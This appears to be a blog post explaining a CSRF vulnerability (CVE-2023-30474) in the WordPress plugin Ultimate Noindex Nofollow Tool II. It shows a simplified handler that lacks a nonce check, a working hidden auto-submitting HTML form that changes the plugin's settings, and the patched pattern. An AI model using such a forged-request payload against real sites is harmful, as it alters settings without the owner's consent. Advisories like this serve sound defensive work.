If you run a WordPress site, chances are you use plugins to help with SEO and content control. One such tool, Ultimate Noindex Nofollow Tool II by Kilian Evang, makes managing page-indexing a breeze. But as of version 1.3 and earlier, something worrying lurked beneath its simple interface: a Cross-Site Request Forgery (CSRF) vulnerability—CVE-2023-30474. This post breaks down the issue with easy-to-understand language, key details, real code, and how this bug can be exploited.
What is CSRF and Why Does It Matter?
Cross-Site Request Forgery (CSRF) tricks a logged-in user into performing unwanted actions on a web app. Imagine you’re an admin, signed into your WordPress site. If you click a malicious link, you might unknowingly give a hacker control—even if you never see what happened.
Why’s this bad with plugins?
Many plugins add their own admin panels. If their security checks are missing, any change—like altering SEO settings—can be made by someone else, as if you did it.
The Vulnerability in a Nutshell
Affected plugin:
Ultimate Noindex Nofollow Tool II
Versions:
1.3 and below
Author:
Kilian Evang
Vulnerability:
CSRF lets attackers change plugin settings by tricking logged-in users.
What Goes Wrong?
In affected versions, the plugin's admin page allows settings changes via POST requests but doesn’t properly verify requests with a CSRF token (also known as a nonce in WordPress). That means *any* site can submit data on your behalf.
Visualizing The Problem: Code Snippet
Here’s a stylized snippet to show what happens under the hood (real code may differ, but the logic matches):
// In plugin admin handler (simplified!)
// Missing: check_admin_referer() or nonce validation
if (isset($_POST['submit'])) {
// No nonce - just trust the POST data:
update_option('ultimate_nn_settings', $_POST['settings']);
echo "Settings updated!";
}
What’s missing?
A line like this:
check_admin_referer('ultimate_nn_save_settings');
Without it, anyone can send a crafted POST, and WordPress won’t block unauthorized changes.
Say you’re logged into your WordPress admin. You visit a site with hidden, hostile HTML, like this
<form action="http://yourwordpress.com/wp-admin/options-general.php?page=ultimate_nn"; method="POST" style="display:none" id="csrf">
<input type="hidden" name="settings[noindex]" value="1">
<input type="hidden" name="settings[nofollow]" value="1">
<input type="hidden" name="submit" value="Save">
</form>
<script>
document.getElementById('csrf').submit();
</script>
This causes your browser to send the form to your WordPress admin—setting both "noindex" and "nofollow" on your whole site! The plugin processes it as if you clicked "save" yourself.
A real attacker can
- Mess up your SEO (noindex/nofollow everything)
The Aftermath and Patching
The issue is now fixed in later versions. Proper CSRF protection uses WordPress’ built-in “nonce” checks, blocking all tricks unless the request comes from your site.
Here’s a safer pattern
if (isset($_POST['submit']) && check_admin_referer('ultimate_nn_save_settings')) {
update_option('ultimate_nn_settings', $_POST['settings']);
echo "Settings updated securely!";
}
To stay safe, upgrade to the latest version of the plugin! And in general, never trust form submissions without a CSRF token/nonce check.
Original CVE Entry:
WPScan Advisory:
wpscan.com/vulnerability/2e6e7e3f-2743-4926-ac37-b34c061b39fd
Plugin on WordPress.org:
Ultimate Noindex Nofollow Tool II
Key Takeaway
If you use Ultimate Noindex Nofollow Tool II on your WordPress site, update it beyond version 1.3—now. Always be sure your plugins (or your own custom code) call check_admin_referer on every setting change form.
> When in doubt, check for nonce fields. Their absence might cost you a lot more than just a ranking.
Timeline
Published on: 04/16/2023 08:15:00 UTC
Last modified on: 04/25/2023 20:29:00 UTC